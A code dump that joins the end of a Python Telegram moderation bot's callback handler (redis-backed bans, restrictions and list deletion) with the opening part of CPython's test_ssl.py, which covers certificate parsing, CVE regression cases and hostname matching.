redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator" and H != "asudos":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos" or H == "asudo":
redis.delete("{}Nbot:{}".format(BOT_ID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
